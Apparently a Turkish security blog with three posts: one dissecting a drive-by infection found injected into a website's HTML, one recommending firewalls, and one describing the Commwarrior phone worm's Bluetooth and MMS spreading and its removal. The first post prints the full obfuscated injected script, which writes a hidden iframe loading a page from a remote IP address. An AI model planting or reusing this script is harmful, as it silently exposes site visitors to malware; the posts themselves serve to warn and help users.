Merhaba arkadaşlar bir internet sayfasında surf yaparken denk geldim… HTML kodları arasına bulaşan bu virüsü bir kısım antivirüs programları algılamıyor malesef. Şuan deneme amaçlı kulllandığım Antivir programı hemen beni uyardı. Söylediğim gibi sörf yaparken denk geldim bu uyarıya.. Öncelikle birkaç antivirüs programı ile kontrol ettim ama yakalamadılar. Sadece Antivir mi yakalıyor ? O zaman bir yanlış anlaşılma olabilir dedim.

Yanlış bir alarm olup olmadığını kontrol için hemen eplorer de sağ tıklayıp kaynağı görüntüle yaptım… HTML kodlarını yukarıdan aşağıya doğru inerken </body> </html> kodlarından sonra aşağıdaki kodlara denk geldim…

</body>
</html>
<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe> <script> function v4804105e4e5e9(v4804105e4eda0){ function v4804105e4f56f () {return 16;} return(parseInt(v4804105e4eda0,v4804105e4f56f()));}function v4804105e5050c(v4804105e50ce5){ function v4804105e524c7 () {var v4804105e52cc0=2; return v4804105e52cc0;} var v4804105e514d9='';for(v4804105e51cd1=0; v4804105e51cd1<v4804105e50ce5.length; v4804105e51cd1+=v4804105e524c7()){ v4804105e514d9+=(String.fromCharCode(v4804105e4e5e9(v4804105e50ce5.substr(v4804105e51cd1, v4804105e524c7()))));}return v4804105e514d9;} document.write(v4804105e5050c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A363930292B2733383037353537655C272077696474683D3639206865696768743D3130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')); </script>

Tabiki kodları incelemeye aldım. Gördüm ki bu kodlar sayfanın en altına bir iframe açmakta ve gizli olarak açmakta…

<iframe src='http://url ' width='1' height='1' style = 'visibility: hidden;'> </iframe>

Scriptide bu iframe içerisinde çalıştırıyor. Tabiki “hidden;” kodunu görmüşsünüzdür. Yani gizli olarak açmakta. Kullanıcı hiçbir şekilde fark etmiyor…

Bu iframe içersinde scripti çalıştırıyor. Script ise 77.221.133.190 ip adresine bağlanmakta.

http://77.221.133.X/.if/go.html?[random_nr]

Scrip çalıştığında bu hale geliyor…

İp adresini sorguladığımda ise

Results:
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
% To receive output for a database update, use the “-B” flag.

% Information related to ‘77.221.128.0 - 77.221.143.255′

inetnum: 77.221.128.0 - 77.221.143.255
netname: DATAPOINT-NET2
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants mailto:abuse@infobox.ru
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
status: ASSIGNED PA
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
e-mail: abuse@infobox.ru
phone: +7 812 3312999
nic-hdl: IBA-RIPE
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

% Information related to ‘77.221.128.0/19AS30968′

route: 77.221.128.0/19
descr: DATACENTER2
origin: AS30968
mnt-by: INFOBOX-MNT
source: RIPE # Filtered

Rusyada bir datacenter karşıma çıkıyor. Aman dikkat işin içerisinde RUSLAR varsa dikkat etmek lazım:)

Script çalıştığında çıkan sonuç..

Tavsiyem bu virüsü yakalayabilen bir anti-virüs programı ile sisteminiizi taratmanızdır. Birdefender ve Antivir bizzat denedim yakalayabiliyor.. Çok tehlikeli bir virüs değil.Tam olarakda sistemde yani windows’ta ne yapıyor bilmiyorum. Bunuda biraz araştıracağım. Tabi öncelikle kendi sistemime bulaştırdığım bu virüsü kaldıracağım sonrada site sahibini uyaracağım. Eminim farkında bile değildir….

SONUÇ :

En iyi virüs programı yoktur…

Birçok program iyidir fakat en iyisi diye bir belirleme yapamayız.

Bazıları anti-virüslerde iyidir trojanlarda zayıf bazıları trojanlarda çok iyidir fakat virüslerde zayıf bazılarıda güvenlik duvarında iyidir fakat diğer yönleri zayıf olabilir…

Merhaba arkadaşlar Güvenlik ve teknoloji; Neler yapabiliriz ? -4 yazımda sizlere Windows updatelerinizi almanız gerektiğinden ve öneminden bahsetmiştim. Ayrıca sadece Microsoft işletim sistemi için değil ister Linux istersenizde diğer işletim sistemlerini kullanın eğer ki güvenlik güncelleştirmelerinizi almazsanız sisteminizin arka kapılarından muhakkak ki bir black hacker’in sızabileceğini ve hatta bir virüsün sisteminize sızabileceğini gördük. Şimdi ise

2- Güvenlik Duvarı :

Özelliklede windows kullanıcıları her ne hikmetse güvenlik duvarını açık bırakırlar. Ha çok işe yaramıyor diyenlerde var ama yinede standart güvenlik duvarınızı muhakkak ki açık duruma getirin. Ayrıca sadece Windows güvenlik duvarıylada kalmıyor. Sisteminize bir Firwall yani güvenlik duvarıda kurmanız gerekmektedir. Piyasada…

Zone Alarm

Outpost

Comodo

…gibi güvenlik duvarları var çok da iyi ve sisteminize sağlam bir güvenlik sağlamaktadırlar. Eğerki ücretsiz bir firewall isterseniz size tavsiyem ücretlilerden bile daha iyi olan COMODO Firewall Pro Program Testimiz..! (ÜCRETSİZ ve Türkçe) makalemi okumanızdır. Comodo Firewall programı çok işinize yarayacak ve sisteminize tam güvenlik sağlayacaktır. Ayrıca Firewall testleri ve sonuçlarını görüp kendi tercihinizi yapmak isterseniz Firewall Test makalemi okuyabilirsiniz.

Şimdiye kadar 1. Güvenlik güncelleştirmelerini yaptık ve 2. olarakda Sistemimize sağlam bir Firewall programı kurduk. 3. olarakda sisteminize muhakkak ki bir Anti-Virüs programı kurmanız olacaktır. Bunuda diğer yazımda sizlerle paylaşacağım.

Güvenlik duvarı kurmamızın en büyük nedeni sisteminizdeki portları kontrol etmesi ve sisteminizde internete çıkacak olan veyahut internet üzerinden sisteminize bağlanmaya kalkışacak olan kişi yada yazılımları tespit etmektir. Güvenlik duvarı bir program internete çıkış yapacağı zaman sizi uyarız isterseniz Aktif edersiniz o program internete çıkar istersenizde Bloke ederek o programın internet kullanımını yasaklayabilirsiniz. Böylelikle sizden izinsiz hiçbir program internete çıkamaz veyahut internet üzerinden hiçbir bağlantı PC nize giriş yapamaz.

Normal şartlar altında bir güvenlik duvarınız yoksa internete çıkan progamları bilemezsiniz veyahut internet üzerinden sisteminize girişleri göremeyeceksiniz. Siz siz olun mutlaka bir Firewall ( Güvenlik Duvarı ) Sisteminize kurunuz. Böylelikle kontrol sizde olacaktır. Bilgisayar sizi yöneteceğine siz bilgisayarı yöneteceksiniz.

Yazımın devamında görüşmek üzere…

Son 1 haftadır notebook’umu şirkette açtığım anda pc’me 6260 telefonundan bluetooth ile bağlantı sağlamaya çalışan biri denk geliyor. Önceleri şirkettekilerden birisi benimle kafa buluyor sanıyordum her seferinde hayır deyip dosya aktarımını iptal ediyorum. Arada bir Bluetooth’umu açmak zorunda kaldığım zaman patır kütür dosya gönderiyor. Uyuz oldum tabi şirkettekilere tek tek soruyorum bu telefon kimin kim bana dosya gönderiyor diye baktım ki hiçkimse göndermiyor…

Sonunda bu telefonun kime ait olduğunu bulmak için dosya aktarımını kabul ettim. Dosyayı C:\Users\TEAkolik\Documents\Bluetooth\Inbox klasörüme kayıt ettim dosya aktarımı bitti anında virüs programım uyarı verdi. Virüs var diye…

Dosya aktarımı biter bitmez tekrar gönderdi tekrar ve tekrar her dakka başı bağlanıp tekrar dosya gönderiyor gönderdiği dosyaların adı

7ctmzslu.sis
i34pabg1ar4.sis
jgh6rglu.sis

Hepsi nokia uygulama dosyası.. Yani öyle bir virüs ki bluetooth açık ne bulursa kendini kopyalamak için dosya göndermeye çalışıyor.

Virüsü biraz araştırdım ve gördüm ki…

SymbOS.Commwarrior.D

isimli bu virüs çok da tehlikeli ve çokda zararlı bir virüs değil. Ne yaptığını tam olarak çözemedim ama anladığım kadarıyla şimdilik kendini mümkün olduğunca çok telefona kopyalamak için saniye başı dosya aktarımı yapmakta…

Eğer ki dosyayı alıpda YES e basarsanız size şöyle bir uyarı veriyor.

Install
Sexoo-Chattz
Aha sex hemen atlar millet zaten bir yes daha yaparsanız …

• [Drive]\system\apps\UltraPlayer\ultraplayer.exe
• [Drive]\system\apps\UltraPlayer\inition.mdl

Bu dosyaları yukarıdaki gördüğünüz klasörlere oluşturuyor. Yani sisteminize kendini gömüyor..

• e:\system\recogs\inition.mdl
• e:\system\wmedias\inition.mdl
• e:\system\wmedias\ultraplayer.exe

Bu dosyalarıda Hafıza kartınıza kopyalıyor. Tabi iş burada bitmiyor..

Her dakika boyunca bluetooth ile diğer cep telefonlarını arıyor bulduğuna kendini gönderiyor..

Dahası da var..

e:\system\wmedias\Codec.sis

bu dosyayı oluşturup sisteminizde farklı isimlerle yukarıda belirttiğim gibi

7ctmzslu.sis
i34pabg1ar4.sis
jgh6rglu.sis

bu tip saçma isimlerle gönderiyor sadece bluetooth dan gönderse gene iyi en fazla pilinizi yer bitirir ama malesef … Sizin telefon rehberinizdeki herkese bir güzel MMS mesajı atmaya başlıyor…

yine sis uzantılı bu dosyayı yani kendi kopyasını MMS mesajına ekleyip telefon rehberinizdeki arkadaşlara

Başlık: Ahmet Hüseyin
Mesaj: Bu mesajı kesin okuman lazım!

Başlık: Selim Ağa
Mesaj: Sana kendimi gönderdim!

başlık: Naber !!
Mesaj: Sex yapmak ister misim ?

gibi mesaj başlıkları ile dosyayı gönderiyor. Telefon rehberinizdeki herkes olmasada büyük çoğunluk bu meajları kabul edecek daha sonrada onada virüs bulaşmış olacaktır. Aman dikkat

Siz siz olun…

• Bluetooth açık kalmasın
• Dosya transferinde şifre kullanın
• Bilmediğiniz kişilerden gelen dosya transferlerini kabul etmeyin
• MMS mesajlarına dikkat edin.

Peki bu virüsü nasıl sileceğiz ?

Aslında basit… Birkaç dosyayı silerek kurtulabilirsiniz…

• [Drive]\system\apps\UltraPlayer\ultraplayer.exe
• [Drive]\system\apps\UltraPlayer\inition.mdl

Bu dosyaları siliniz. Bu dosyalar telefon hafızanızda yer almakta bu dosyaları sildikten sonra HAFIZA KARTINIZA bulaşmış olan

• e:\system\recogs\inition.mdl
• e:\system\wmedias\inition.mdl
• e:\system\wmedias\ultraplayer.exe
• e:\system\wmedias\Codec.sis

Dosyalarıda tek tek silmeniz gerekmekte eğer çok önemli bir bilginiz yoksa hafıza kartınıza format atmanızı öneririm.

Sonrada telefonunuzu KAPATIN / TEKRAR AÇIN …

İşlem bitmiştir…

Ben bunları yapamam daha başka yolu yokmu diyorsanız..

1. Telefonunuzdan Wap bölümünü açabilirsiniz.

2. http://mobile.f-secure.com adresine giriniz.

3. Download F-Secure basarak telefonunuza Anti-Virüs programını indiriniz.

4. F-Secure telefonunuza indikten sonra Programı kurunuz.

5. Programlar menüsünden Anti-Virüs programını çalıştırınız.

6. Anti-virüs programı ile tarama yapınız.

7. Virüsleri bulduktan sonra bir güzel temizler sonrada telefonunuzu kapatıp açınız.

Kaynaklar : F-Secure ve Symantec